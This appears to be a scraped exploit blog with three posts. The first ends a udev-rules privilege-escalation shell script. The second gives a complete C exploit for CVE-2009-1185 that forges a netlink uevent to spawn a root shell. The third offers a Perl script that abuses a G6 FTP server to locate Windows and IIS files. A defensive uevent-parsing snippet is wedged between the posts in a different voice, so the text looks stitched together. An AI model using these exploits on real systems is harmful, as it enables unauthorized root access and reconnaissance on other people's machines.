echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

That's the Underground one, which is nice and neat, fast and furiouz :>
Enjoy them all, old now anyhow..
XD

CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit (Alternate/cleaner than the kcope bash version)

Posted on 8th January 2012 in Exploits

YES! Amazingly, I do like SOME of Jono's code! Yes, when it is neater and nicer than the alternatives, of course, but NOT when they're crippled :) k thx. So, this is being posted now, a bit late but better than never..

/*
 * CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * Information:
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *   udev before 1.4.1 does not verify whether a NETLINK message originates
 *   from kernel space, which allows local users to gain privileges by sending
 *   a NETLINK message from user space.
 * Notes:
 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int main(int argc, char **argv) {
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "a@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=bin/sh -i") +1;  //-- root cmd here
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}

XD
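Both udev exploits above (kcope's script and the CVE-2009-1185.c version) work because udevd before 141 accepted uevents from any netlink sender; the fix was to look at the sender address recvmsg() fills into msg_name and drop anything whose nl_pid is not 0, since only the kernel sends from port id 0. As an added example, not code from the page or from udev, here is that origin check applied before a uevent in the page's NUL-separated "action@devpath\0KEY=VALUE\0..." layout is parsed; the function names and the constructed sample message (with a harmless REMOVE_CMD) are mine.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#define UEVENT_MAX_FIELDS 32

/* A parsed uevent: pointers into the caller's buffer, one per "KEY=VALUE". */
struct uevent {
    const char *header;                  /* "action@devpath" */
    const char *field[UEVENT_MAX_FIELDS];
    int nfields;
};

/* The origin check udev < 141 lacked (CVE-2009-1185). The kernel's uevent
 * sender address carries nl_pid 0; any other port id is a user-space socket,
 * so the message must be dropped before any of its keys are trusted. */
int uevent_sender_is_kernel(const struct sockaddr_nl *snl, socklen_t snl_len)
{
    if (snl == NULL || snl_len < sizeof(*snl))
        return 0;
    if (snl->nl_family != AF_NETLINK)
        return 0;
    return snl->nl_pid == 0;
}

/* Parse the NUL-separated message; 0 on success, -1 if malformed. */
int uevent_parse(const char *buf, size_t len, struct uevent *ev)
{
    size_t off;
    memset(ev, 0, sizeof(*ev));
    if (len == 0 || buf[len - 1] != '\0')
        return -1;                       /* every field must be NUL terminated */
    ev->header = buf;
    if (strchr(buf, '@') == NULL)
        return -1;                       /* header is not "action@devpath" */
    off = strlen(buf) + 1;
    while (off < len) {
        const char *f = buf + off;
        const char *eq = strchr(f, '=');
        if (eq == NULL || eq == f)
            return -1;                   /* KEY=VALUE required */
        if (ev->nfields == UEVENT_MAX_FIELDS)
            return -1;
        ev->field[ev->nfields++] = f;
        off += strlen(f) + 1;
    }
    return 0;
}

/* Look up a key's value; NULL when absent. */
const char *uevent_get(const struct uevent *ev, const char *key)
{
    size_t kl = strlen(key);
    int i;
    for (i = 0; i < ev->nfields; i++)
        if (strncmp(ev->field[i], key, kl) == 0 && ev->field[i][kl] == '=')
            return ev->field[i] + kl + 1;
    return NULL;
}

/* What a hardened receiver does per message: verify the origin first, parse
 * only afterwards. Returns 0 if accepted, -1 if dropped or malformed. */
int uevent_receive(const struct sockaddr_nl *snl, socklen_t snl_len,
                   const char *buf, size_t len, struct uevent *ev)
{
    if (!uevent_sender_is_kernel(snl, snl_len))
        return -1;                       /* user-space sender: never parsed */
    return uevent_parse(buf, len, ev);
}

/* Constructed sample message in the layout the exploits above build, with a
 * harmless REMOVE_CMD; returns its length, 0 if the buffer is too small. */
size_t uevent_sample(char *out, size_t cap)
{
    static const char *parts[] = {
        "remove@/dev/foo", "SUBSYSTEM=block", "DEVPATH=/dev/foo",
        "ACTION=remove", "REMOVE_CMD=/bin/true"
    };
    size_t off = 0, i;
    for (i = 0; i < sizeof(parts) / sizeof(parts[0]); i++) {
        size_t n = strlen(parts[i]) + 1;  /* copy the terminating NUL too */
        if (off + n > cap)
            return 0;
        memcpy(out + off, parts[i], n);
        off += n;
    }
    return off;
}
```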

G6 FTP Server file disclosure vuln script [some Perl code to play with] #HAXNET

Posted on 6th January 2012 in Exploits, Uncategorized

G6 FTP Server file disclosure vulnerability script here, for anyone fuzzing with G6…. seems to have a very big userbase on Windows for sure..
ENJOY!

######HAXNET
#!/usr/bin/perl
# G6 Ftp Server file disclosure vulnerability script
use Getopt::Std;
use IO::Socket;

getopts('h:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives);
$CRLF = "\015\012";
@drives = ("c","d","e","f","s","h","x","i","j");    ## added usb thumb/sdcard/miscro-hubs etc support and laptop/ipad
$port = 21;
$login = 'anonymous';     ## change this if want but this is good for Fingerprint on ranges...with me
$pass = 'anonymous';      ## again this should be changed like sometimes its user@localhost.net ,idk
if (defined $args{h}) {
$host = $args{h};
} else {
print "[-] No host specified.\n";
exit;
}
if (defined $args{l}) {
$login = $args{l};
}
if (defined $args{p}) {
$pass = $args{p};
}
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("[-] Socket error: $!");
$sock_res = <$sock>;
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;
if ($sock_res !~ /230\s/) {
print "[-] Login/pass not accepted..exiting.\n";
close($sock);
exit;
}
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;
if (lc($sock_res) !~ /\/[a-z][:]\//) {
print "[-] Looks like 'show relative path' is enabled..exiting.\n";
close($sock);
exit;
}
print "[+] Attempting to locate system files..";
$win_base = &FindWindows;
$iis_base = &FindIIS;
print "[!] DONE.\n\n";
close($sock);
print "[!] Windows directory: $win_base\n";
print "[!] Hints to IIS path: $iis_base\n";
exit;

sub FindWindows {
my @win_dirs = ("win","windows","winnt","winme","windows.0");  ## added a cpl here wich were missing, could also be updated more..
foreach $drive (@drives) {
foreach $dir (@win_dirs) {
print ".";
print $sock "SIZE /$drive:/$dir/regedit.exe" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
return("$drive:\\$dir");}
}
}
return("[x] Not found");
}

sub FindIIS {
my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp");
foreach $drive (@drives) {
foreach $file (@iis_files) {
print ".";
print $sock "SIZE /$drive:/$file" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
$file =~ s/\//\\/g;
return("$drive:\\$file");
}
}
}
return("[x] Not found");
}

Enjoy,
XD@#HAXNET@EF